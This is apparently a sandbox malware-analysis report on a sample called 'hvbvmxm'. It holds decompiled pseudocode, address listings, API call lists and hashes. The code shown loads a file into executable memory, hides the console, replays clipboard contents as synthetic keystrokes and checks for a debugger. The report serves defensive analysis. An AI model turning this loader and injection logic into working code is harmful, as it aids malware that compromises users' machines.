                                                  															L45:
                                                  															__eflags = _v24 - 0xffff;
                                                  															if(_v24 > 0xffff) {
                                                  																goto L47;
                                                  															} else {
                                                  																__eflags =  *_v16 & 0x0000ffff;
                                                  																if(( *_v16 & 0x0000ffff) == 0) {
                                                  																	goto L13;
                                                  																} else {
                                                  																	goto L47;
                                                  																}
                                                  															}
                                                  														} else {
                                                  															__eflags =  *0x41feb4;
                                                  															if( *0x41feb4 == 0) {
                                                  																L47:
                                                  																_t414 = 1;
                                                  															} else {
                                                  																goto L45;
                                                  															}
                                                  														}
                                                  													} else {
                                                  														_t414 = 1;
                                                  													}
                                                  												}
                                                  												goto L118;
                                                  											}
                                                  											asm("sbb eax, eax");
                                                  											_t427 = _t426 | 0x00000001;
                                                  											__eflags = _t427;
                                                  											_v132 = _t427;
                                                  											goto L40;
                                                  										} else {
                                                  											 *0x41feb4 = 1;
                                                  											 *0x41feb8 = 1;
                                                  											_v116 = 1;
                                                  											goto L13;
                                                  										}
                                                  										goto L118;
                                                  									}
                                                  									asm("sbb ecx, ecx");
                                                  									_t517 = _t516 | 0x00000001;
                                                  									__eflags = _t517;
                                                  									_v128 = _t517;
                                                  									goto L31;
                                                  								} else {
                                                  									_v116 = 1;
                                                  									L13:
                                                  									_t441 = _v8 + 1;
                                                  									__eflags = _t441;
                                                  									_v8 = _t441;
                                                  									goto L14;
                                                  								}
                                                  								goto L118;
                                                  							}
                                                  							asm("sbb edx, edx");
                                                  							_t600 = _t599 | 0x00000001;
                                                  							__eflags = _t600;
                                                  							_v124 = _t600;
                                                  							goto L22;
                                                  						}
                                                  						__eflags =  *0x41fea8;
                                                  						if( *0x41fea8 != 0) {
                                                  							__eflags = _v24;
                                                  							if(_v24 == 0) {
                                                  								_v24 = 0x50;
                                                  							}
                                                  							__eflags = _v20;
                                                  							if(__eflags == 0) {
                                                  								_v20 = 0x96;
                                                  							}
                                                  							_t508 = _v20;
                                                  							 *0x41feb0 = E00402960(_v20, __eflags, 0x41fea8, 1, _v24, _v20);
                                                  							__eflags =  *0x41feb0;
                                                  							if( *0x41feb0 != 0) {
                                                  								__eflags = _v116;
                                                  								if(_v116 == 0) {
                                                  									_t406 = E004046F0(_t633, 0x41fea8);
                                                  									__eflags = _t406;
                                                  									if(_t406 != 0) {
                                                  										GetStartupInfoW( &_v260);
                                                  										_v28 = _v260.lpTitle;
                                                  										_t591 = _v28 + 2;
                                                  										__eflags = _t591;
                                                  										_v180 = _t591;
                                                  										do {
                                                  											_v96 =  *_v28;
                                                  											_v28 = _v28 + 2;
                                                  											__eflags = _v96;
                                                  										} while (_v96 != 0);
                                                  										_v184 = _v28 - _v180 >> 1;
                                                  										E00406640(0x41fea8, _v260.lpTitle, _v184 << 1);
                                                  										__eflags = _v260.dwFlags & 0x00000001;
                                                  										if((_v260.dwFlags & 0x00000001) == 0) {
                                                  											_v148 = 5;
                                                  										} else {
                                                  											_v148 = _v260.wShowWindow & 0x0000ffff;
                                                  										}
                                                  										_t597 =  *0x41ff50; // 0x0
                                                  										ShowWindow(_t597, _v148);
                                                  										goto L117;
                                                  									} else {
                                                  										_t414 = 1;
                                                  									}
                                                  								} else {
                                                  									 *0x41ff58 = GetStdHandle(0xfffffff6);
                                                  									 *0x41ff5c = GetStdHandle(0xfffffff5);
                                                  									__eflags =  *0x41ff58;
                                                  									if( *0x41ff58 != 0) {
                                                  										L103:
                                                  										E00404690(0x41fea8);
                                                  										__eflags =  *0x41feb4;
                                                  										if( *0x41feb4 != 0) {
                                                  											L106:
                                                  											goto L108;
                                                  										} else {
                                                  											_t419 = E004034E0(_t508, 0x41fea8);
                                                  											__eflags = _t419;
                                                  											if(_t419 != 0) {
                                                  												goto L106;
                                                  											} else {
                                                  												_t414 = 1;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										__eflags =  *0x41ff5c;
                                                  										if( *0x41ff5c == 0) {
                                                  											 *0x41febc = 1;
                                                  											L108:
                                                  											L117:
                                                  											_t414 = E00404CA0(0x41fea8, _v152);
                                                  										} else {
                                                  											goto L103;
                                                  										}
                                                  									}
                                                  								}
                                                  							} else {
                                                  								_t414 = 1;
                                                  							}
                                                  						} else {
                                                  							_t414 = 1;
                                                  						}
                                                  					} else {
                                                  						_t414 = 1;
                                                  					}
                                                  				} else {
                                                  					_t414 = 0;
                                                  				}
                                                  				L118:
                                                  				return _t414;
                                                  			}
                                                  0x00409a89
                                                  0x00409a89
                                                  0x00409a8c
                                                  0x00409a90
                                                  0x00409a97
                                                  0x00409a97
                                                  0x00409a9b
                                                  0x00000000
                                                  0x00409a9d
                                                  0x00409a9d
                                                  0x00409aa1
                                                  0x00409aa5
                                                  0x00409aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409aaa
                                                  0x00409a9b
                                                  0x00409abd
                                                  0x00409ac0
                                                  0x00409ac6
                                                  0x00409acd
                                                  0x00409adb
                                                  0x00409aeb
                                                  0x00409aee
                                                  0x00409aee
                                                  0x00409af1
                                                  0x00409af4
                                                  0x00409afb
                                                  0x00409afe
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b00
                                                  0x00409b05
                                                  0x00409b2a
                                                  0x00409b2a
                                                  0x00409b07
                                                  0x00409b07
                                                  0x00409b0a
                                                  0x00409b0e
                                                  0x00409b15
                                                  0x00409b15
                                                  0x00409b19
                                                  0x00000000
                                                  0x00409b1b
                                                  0x00409b1b
                                                  0x00409b1f
                                                  0x00409b23
                                                  0x00409b28
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b28
                                                  0x00409b19
                                                  0x00409b3b
                                                  0x00409b3e
                                                  0x00409b44
                                                  0x00409b4b
                                                  0x00409b6d
                                                  0x00409b7d
                                                  0x00409b80
                                                  0x00409b80
                                                  0x00409b83
                                                  0x00409b86
                                                  0x00409b8d
                                                  0x00409b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b92
                                                  0x00409b97
                                                  0x00409bbc
                                                  0x00409bbc
                                                  0x00409b99
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409ba0
                                                  0x00409ba7
                                                  0x00409ba7
                                                  0x00409bab
                                                  0x00000000
                                                  0x00409bad
                                                  0x00409bad
                                                  0x00409bb1
                                                  0x00409bb5
                                                  0x00409bba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bba
                                                  0x00409bab
                                                  0x00409bcd
                                                  0x00409bd0
                                                  0x00409bd6
                                                  0x00409bdd
                                                  0x00409c46
                                                  0x00409c56
                                                  0x00409c59
                                                  0x00409c59
                                                  0x00409c5c
                                                  0x00409c5f
                                                  0x00409c66
                                                  0x00409c69
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c6b
                                                  0x00409c70
                                                  0x00409c95
                                                  0x00409c95
                                                  0x00409c72
                                                  0x00409c72
                                                  0x00409c75
                                                  0x00409c79
                                                  0x00409c80
                                                  0x00409c80
                                                  0x00409c84
                                                  0x00000000
                                                  0x00409c86
                                                  0x00409c86
                                                  0x00409c8a
                                                  0x00409c8e
                                                  0x00409c93
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c93
                                                  0x00409c84
                                                  0x00409cac
                                                  0x00409cb2
                                                  0x00409cb8
                                                  0x00409cbf
                                                  0x00409d28
                                                  0x00409d38
                                                  0x00409d3b
                                                  0x00409d3b
                                                  0x00409d3e
                                                  0x00409d41
                                                  0x00409d48
                                                  0x00409d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d4d
                                                  0x00409d52
                                                  0x00409d77
                                                  0x00409d77
                                                  0x00409d54
                                                  0x00409d54
                                                  0x00409d57
                                                  0x00409d5b
                                                  0x00409d62
                                                  0x00409d62
                                                  0x00409d66
                                                  0x00000000
                                                  0x00409d68
                                                  0x00409d68
                                                  0x00409d6c
                                                  0x00409d70
                                                  0x00409d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d75
                                                  0x00409d66
                                                  0x00409d8e
                                                  0x00409d94
                                                  0x00409d9a
                                                  0x00409da1
                                                  0x00409df5
                                                  0x00409e05
                                                  0x00409e08
                                                  0x00409e08
                                                  0x00409e0b
                                                  0x00409e0e
                                                  0x00409e15
                                                  0x00409e18
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e1a
                                                  0x00409e1f
                                                  0x00409e44
                                                  0x00409e44
                                                  0x00409e21
                                                  0x00409e21
                                                  0x00409e24
                                                  0x00409e28
                                                  0x00409e2f
                                                  0x00409e2f
                                                  0x00409e33
                                                  0x00000000
                                                  0x00409e35
                                                  0x00409e35
                                                  0x00409e39
                                                  0x00409e3d
                                                  0x00409e42
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e42
                                                  0x00409e33
                                                  0x00409e5b
                                                  0x00409e61
                                                  0x00409e67
                                                  0x00409e6e
                                                  0x00409ec1
                                                  0x00409e70
                                                  0x00409e76
                                                  0x00409e7c
                                                  0x00409e7f
                                                  0x00409e9b
                                                  0x00409ea0
                                                  0x00409ea3
                                                  0x00409eae
                                                  0x00409eb0
                                                  0x00000000
                                                  0x00409eb2
                                                  0x00409eb2
                                                  0x00409eb2
                                                  0x00409e81
                                                  0x00409e81
                                                  0x00409e81
                                                  0x00409e7f
                                                  0x00000000
                                                  0x00409e6e
                                                  0x00409e50
                                                  0x00409e52
                                                  0x00409e52
                                                  0x00409e55
                                                  0x00000000
                                                  0x00409da3
                                                  0x00409da9
                                                  0x00409daf
                                                  0x00409db2
                                                  0x00409dce
                                                  0x00409dd3
                                                  0x00409dd6
                                                  0x00409de2
                                                  0x00409de4
                                                  0x00000000
                                                  0x00409de6
                                                  0x00409de6
                                                  0x00409de6
                                                  0x00409db4
                                                  0x00409db4
                                                  0x00409db4
                                                  0x00409db2
                                                  0x00000000
                                                  0x00409da1
                                                  0x00409d83
                                                  0x00409d85
                                                  0x00409d85
                                                  0x00409d88
                                                  0x00000000
                                                  0x00409cc1
                                                  0x00409cc7
                                                  0x00409ccd
                                                  0x00409cd0
                                                  0x00409cec
                                                  0x00409cf1
                                                  0x00409cf4
                                                  0x00409cf7
                                                  0x00409cfb
                                                  0x00409d06
                                                  0x00409d06
                                                  0x00409d0d
                                                  0x00000000
                                                  0x00409d0f
                                                  0x00409d15
                                                  0x00409d17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d17
                                                  0x00409cfd
                                                  0x00409cfd
                                                  0x00409d04
                                                  0x00409d19
                                                  0x00409d19
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d04
                                                  0x00409cd2
                                                  0x00409cd2
                                                  0x00409cd2
                                                  0x00409cd0
                                                  0x00000000
                                                  0x00409cbf
                                                  0x00409ca1
                                                  0x00409ca3
                                                  0x00409ca3
                                                  0x00409ca6
                                                  0x00000000
                                                  0x00409bdf
                                                  0x00409be5
                                                  0x00409beb
                                                  0x00409bee
                                                  0x00409c0a
                                                  0x00409c0f
                                                  0x00409c12
                                                  0x00409c15
                                                  0x00409c19
                                                  0x00409c24
                                                  0x00409c24
                                                  0x00409c2b
                                                  0x00000000
                                                  0x00409c2d
                                                  0x00409c33
                                                  0x00409c35
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c35
                                                  0x00409c1b
                                                  0x00409c1b
                                                  0x00409c22
                                                  0x00409c37
                                                  0x00409c37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c22
                                                  0x00409bf0
                                                  0x00409bf0
                                                  0x00409bf0
                                                  0x00409bee
                                                  0x00000000
                                                  0x00409bdd
                                                  0x00409bc5
                                                  0x00409bc7
                                                  0x00409bc7
                                                  0x00409bca
                                                  0x00000000
                                                  0x00409b4d
                                                  0x00409b4d
                                                  0x00409b57
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b4b
                                                  0x00409b33
                                                  0x00409b35
                                                  0x00409b35
                                                  0x00409b38
                                                  0x00000000
                                                  0x00409acf
                                                  0x00409acf
                                                  0x00409a48
                                                  0x00409a4b
                                                  0x00409a4b
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409acd
                                                  0x00409ab5
                                                  0x00409ab7
                                                  0x00409ab7
                                                  0x00409aba
                                                  0x00000000
                                                  0x00409aba
                                                  0x00409ed0
                                                  0x00409ed7
                                                  0x00409ee3
                                                  0x00409ee7
                                                  0x00409ee9
                                                  0x00409ee9
                                                  0x00409ef0
                                                  0x00409ef4
                                                  0x00409ef6
                                                  0x00409ef6
                                                  0x00409efd
                                                  0x00409f11
                                                  0x00409f16
                                                  0x00409f1d
                                                  0x00409f29
                                                  0x00409f2d
                                                  0x00409f9c
                                                  0x00409fa1
                                                  0x00409fa3
                                                  0x00409fb6
                                                  0x00409fc2
                                                  0x00409fc8
                                                  0x00409fc8
                                                  0x00409fcb
                                                  0x00409fd1
                                                  0x00409fd7
                                                  0x00409fdb
                                                  0x00409fdf
                                                  0x00409fdf
                                                  0x00409ff1
                                                  0x0040a00c
                                                  0x0040a017
                                                  0x0040a01a
                                                  0x0040a02b
                                                  0x0040a01c
                                                  0x0040a023
                                                  0x0040a023
                                                  0x0040a03c
                                                  0x0040a043
                                                  0x00000000
                                                  0x00409fa5
                                                  0x00409fa5
                                                  0x00409fa5
                                                  0x00409f2f
                                                  0x00409f37
                                                  0x00409f44
                                                  0x00409f49
                                                  0x00409f50
                                                  0x00409f5b
                                                  0x00409f60
                                                  0x00409f65
                                                  0x00409f6c
                                                  0x00409f86
                                                  0x00000000
                                                  0x00409f6e
                                                  0x00409f73
                                                  0x00409f78
                                                  0x00409f7a
                                                  0x00000000
                                                  0x00409f7c
                                                  0x00409f7c
                                                  0x00409f7c
                                                  0x00409f7a
                                                  0x00409f52
                                                  0x00409f52
                                                  0x00409f59
                                                  0x00409f88
                                                  0x00409f92
                                                  0x0040a049
                                                  0x0040a055
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409f59
                                                  0x00409f50
                                                  0x00409f1f
                                                  0x00409f1f
                                                  0x00409f1f
                                                  0x00409ed9
                                                  0x00409ed9
                                                  0x00409ed9
                                                  0x00409a35
                                                  0x00409a35
                                                  0x00409a35
                                                  0x00409785
                                                  0x00409785
                                                  0x00409785
                                                  0x0040a05a
                                                  0x0040a05d

                                                  APIs
                                                  • GetConsoleWindow.KERNELBASE(00000000), ref: 00409762
                                                  • ShowWindow.USER32(00000000), ref: 00409769
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004097C0
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 004097CF
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004097E5
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00409803
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
                                                  • String ID:
                                                  • API String ID: 3075330158-0
                                                  • Opcode ID: b1f80ec61ccdadc99d9863e4de904c203012d3e5882bac9c5da239e59a9ae882
                                                  • Instruction ID: 1f1830d2cc23a779246c836cc2d3b1d70898170df23fe81b838c687a25145776
                                                  • Opcode Fuzzy Hash: b1f80ec61ccdadc99d9863e4de904c203012d3e5882bac9c5da239e59a9ae882
                                                  • Instruction Fuzzy Hash: F5F03AB1D0521D9BEB109FA0DC1D7EFBBB4AB04305F0045A9E5086A281D7B9065A8FE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E00410F9D() {
                                                  				void* _t3;
                                                  				void* _t16;
                                                  				WCHAR* _t17;
                                                  
                                                  				_t17 = GetEnvironmentStringsW();
                                                  				if(_t17 != 0) {
                                                  					_t11 = E00410F66(_t17) - _t17 & 0xfffffffe;
                                                  					_t3 = E0040F5FB(E00410F66(_t17) - _t17 & 0xfffffffe); // executed
                                                  					_t16 = _t3;
                                                  					if(_t16 != 0) {
                                                  						E0040CC90(_t16, _t17, _t11);
                                                  					}
                                                  					E0040F5C1(0);
                                                  					FreeEnvironmentStringsW(_t17);
                                                  				} else {
                                                  					_t16 = 0;
                                                  				}
                                                  				return _t16;
                                                  			}







                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00410FA1
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00410FE1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free
                                                  • String ID:
                                                  • API String ID: 3328510275-0
                                                  • Opcode ID: ecaf961217ba24798a3e562224b46b8b9cc30bf0b2898681761cef4eb6f5ca9a
                                                  • Instruction ID: c0dea6dba9ea9b9d10109c6112a7322ed234caaed7fb7ba3f99f9463da3d7151
                                                  • Opcode Fuzzy Hash: ecaf961217ba24798a3e562224b46b8b9cc30bf0b2898681761cef4eb6f5ca9a
                                                  • Instruction Fuzzy Hash: DEE0EC37148A1136D13132367C8A9DB0909CBC5675725013BF019512C2EEE84C8701A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 547 40f5fb-40f607 548 40f639-40f644 call 40f9f9 547->548 549 40f609-40f60b 547->549 556 40f646-40f648 548->556 551 40f624-40f635 RtlAllocateHeap 549->551 552 40f60d-40f60e 549->552 553 40f610-40f617 call 40f036 551->553 554 40f637 551->554 552->551 553->548 559 40f619-40f622 call 4127fd 553->559 554->556 559->548 559->551
                                                  C-Code - Quality: 100%
                                                  			E0040F5FB(long _a4) {
                                                  				void* _t4;
                                                  				long _t8;
                                                  
                                                  				_t8 = _a4;
                                                  				if(_t8 > 0xffffffe0) {
                                                  					L7:
                                                  					 *((intOrPtr*)(E0040F9F9(__eflags))) = 0xc;
                                                  					__eflags = 0;
                                                  					return 0;
                                                  				}
                                                  				if(_t8 == 0) {
                                                  					_t8 = _t8 + 1;
                                                  				}
                                                  				while(1) {
                                                  					_t4 = RtlAllocateHeap( *0x421ad0, 0, _t8); // executed
                                                  					if(_t4 != 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = E0040F036();
                                                  					if(__eflags == 0) {
                                                  						goto L7;
                                                  					}
                                                  					__eflags = E004127FD(__eflags, _t8);
                                                  					if(__eflags == 0) {
                                                  						goto L7;
                                                  					}
                                                  				}
                                                  				return _t4;
                                                  			}






                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00402F6E,?,?,0040106B,?,00000000), ref: 0040F62D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: c209d98f1f09c46a0debf532e3f4cf91b806f176d4b977b482a0fc4de4d18bdc
                                                  • Instruction ID: 84bcbb8e3d09251f8ae8c446c74762163e988d77e39962f9827874327a5579b4
                                                  • Opcode Fuzzy Hash: c209d98f1f09c46a0debf532e3f4cf91b806f176d4b977b482a0fc4de4d18bdc
                                                  • Instruction Fuzzy Hash: 05E0E53120061166D7302B769C01B5B368DAB513A0F150537AC14F2AF1CEBACC0B89ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004050C0(intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				unsigned int _v24;
                                                  				int _v28;
                                                  				char _v68;
                                                  				int _t63;
                                                  				intOrPtr* _t105;
                                                  				intOrPtr* _t121;
                                                  				void* _t126;
                                                  				void* _t127;
                                                  
                                                  				_t63 = OpenClipboard( *(_a4 + 0xa8));
                                                  				if(_t63 != 0) {
                                                  					_v16 = GetClipboardData(0xd);
                                                  					if(_v16 == 0) {
                                                  						L12:
                                                  						return CloseClipboard();
                                                  					}
                                                  					_v20 = GlobalLock(_v16);
                                                  					if(_v20 == 0) {
                                                  						goto L12;
                                                  					}
                                                  					_v24 = GlobalSize(_v16) >> 1;
                                                  					 *((short*)(_t127 + 0xffffffffffffffc0)) = 1;
                                                  					 *((short*)(_t127 + 0xffffffffffffffc8)) = 0;
                                                  					 *(_t127 + 0xffffffffffffffd0) = 0;
                                                  					 *((intOrPtr*)(_t127 + 0xffffffffffffffc4)) = 1;
                                                  					_v12 = 0;
                                                  					while(_v12 < _v24) {
                                                  						_v8 = VkKeyScanW( *(_v20 + _v12 * 2) & 0x0000ffff);
                                                  						 *(_t127 + 0xffffffffffffffca) = _v8 & 0xff;
                                                  						 *((short*)(_t127 + 0xffffffffffffffcc)) = MapVirtualKeyW(_v8 & 0xff, 0);
                                                  						 *((short*)(_t127 + 0xffffffffffffffce)) =  *(_v20 + _v12 * 2);
                                                  						_t121 = _t127 + 0xffffffffffffffc0;
                                                  						_t105 = _t127 + 0xbadb6d;
                                                  						 *_t105 =  *_t121;
                                                  						 *((intOrPtr*)(_t105 + 4)) =  *((intOrPtr*)(_t121 + 4));
                                                  						 *((intOrPtr*)(_t105 + 8)) =  *((intOrPtr*)(_t121 + 8));
                                                  						 *((intOrPtr*)(_t105 + 0xc)) =  *((intOrPtr*)(_t121 + 0xc));
                                                  						 *((intOrPtr*)(_t105 + 0x10)) =  *((intOrPtr*)(_t121 + 0x10));
                                                  						 *(_t127 + 0xbadb71) = 0;
                                                  						if(_v12 != _v24 - 1) {
                                                  							_v28 = 0;
                                                  						} else {
                                                  							_v28 = 1;
                                                  						}
                                                  						E0040A190(_t126, _a4,  &_v68, 2, _v28);
                                                  						_v12 = _v12 + 1;
                                                  					}
                                                  					GlobalUnlock(_v16);
                                                  					goto L12;
                                                  				}
                                                  				return _t63;
                                                  			}
















                                                  APIs
                                                  • OpenClipboard.USER32(?), ref: 004050D0
                                                  • GetClipboardData.USER32 ref: 004050E1
                                                  • GlobalLock.KERNEL32 ref: 004050F8
                                                  • GlobalSize.KERNEL32(00000000), ref: 0040510F
                                                  • VkKeyScanW.USER32(?), ref: 00405184
                                                  • MapVirtualKeyW.USER32(00000000,00000000), ref: 004051B9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$DataLockOpenScanSizeVirtual
                                                  • String ID:
                                                  • API String ID: 3765462330-0
                                                  • Opcode ID: 989953fcf0857569b48868dfdd7210a9b5518f73ba3c5d9c920e786e1040871a
                                                  • Instruction ID: d88f2d8c5872141683ffe86d8c3a705b25b32a3e3d496fe11308d2db836d4910
                                                  • Opcode Fuzzy Hash: 989953fcf0857569b48868dfdd7210a9b5518f73ba3c5d9c920e786e1040871a
                                                  • Instruction Fuzzy Hash: BE510774A002099FDB04DFA8C4947AEBBB5FF44300F10857EDA15AB3A0D7799941CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E0040F790(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				char _v0;
                                                  				signed int _v8;
                                                  				intOrPtr _v524;
                                                  				intOrPtr _v528;
                                                  				void* _v532;
                                                  				intOrPtr _v536;
                                                  				char _v540;
                                                  				intOrPtr _v544;
                                                  				intOrPtr _v548;
                                                  				intOrPtr _v552;
                                                  				intOrPtr _v556;
                                                  				intOrPtr _v560;
                                                  				intOrPtr _v564;
                                                  				intOrPtr _v568;
                                                  				intOrPtr _v572;
                                                  				intOrPtr _v576;
                                                  				intOrPtr _v580;
                                                  				intOrPtr _v584;
                                                  				char _v724;
                                                  				intOrPtr _v792;
                                                  				intOrPtr _v800;
                                                  				char _v804;
                                                  				struct _EXCEPTION_POINTERS _v812;
                                                  				signed int _t40;
                                                  				char* _t47;
                                                  				char* _t49;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t67;
                                                  				int _t68;
                                                  				intOrPtr _t69;
                                                  				signed int _t70;
                                                  
                                                  				_t69 = __esi;
                                                  				_t67 = __edi;
                                                  				_t66 = __edx;
                                                  				_t61 = __ebx;
                                                  				_t40 =  *0x41f638; // 0x3fbdb919
                                                  				_t41 = _t40 ^ _t70;
                                                  				_v8 = _t40 ^ _t70;
                                                  				if(_a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					E0040ABEB(_t41);
                                                  					_pop(_t62);
                                                  				}
                                                  				E0040D210(_t67,  &_v804, 0, 0x50);
                                                  				E0040D210(_t67,  &_v724, 0, 0x2cc);
                                                  				_v812.ExceptionRecord =  &_v804;
                                                  				_t47 =  &_v724;
                                                  				_v812.ContextRecord = _t47;
                                                  				_v548 = _t47;
                                                  				_v552 = _t62;
                                                  				_v556 = _t66;
                                                  				_v560 = _t61;
                                                  				_v564 = _t69;
                                                  				_v568 = _t67;
                                                  				_v524 = ss;
                                                  				_v536 = cs;
                                                  				_v572 = ds;
                                                  				_v576 = es;
                                                  				_v580 = fs;
                                                  				_v584 = gs;
                                                  				asm("pushfd");
                                                  				_pop( *_t22);
                                                  				_v540 = _v0;
                                                  				_t49 =  &_v0;
                                                  				_v528 = _t49;
                                                  				_v724 = 0x10001;
                                                  				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                  				_v804 = _a8;
                                                  				_v800 = _a12;
                                                  				_v792 = _v0;
                                                  				_t68 = IsDebuggerPresent();
                                                  				SetUnhandledExceptionFilter(0);
                                                  				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					E0040ABEB(_t57);
                                                  				}
                                                  				return E0040AE5B(_v8 ^ _t70);
                                                  			}





































                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040F888
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F892
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040F89F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
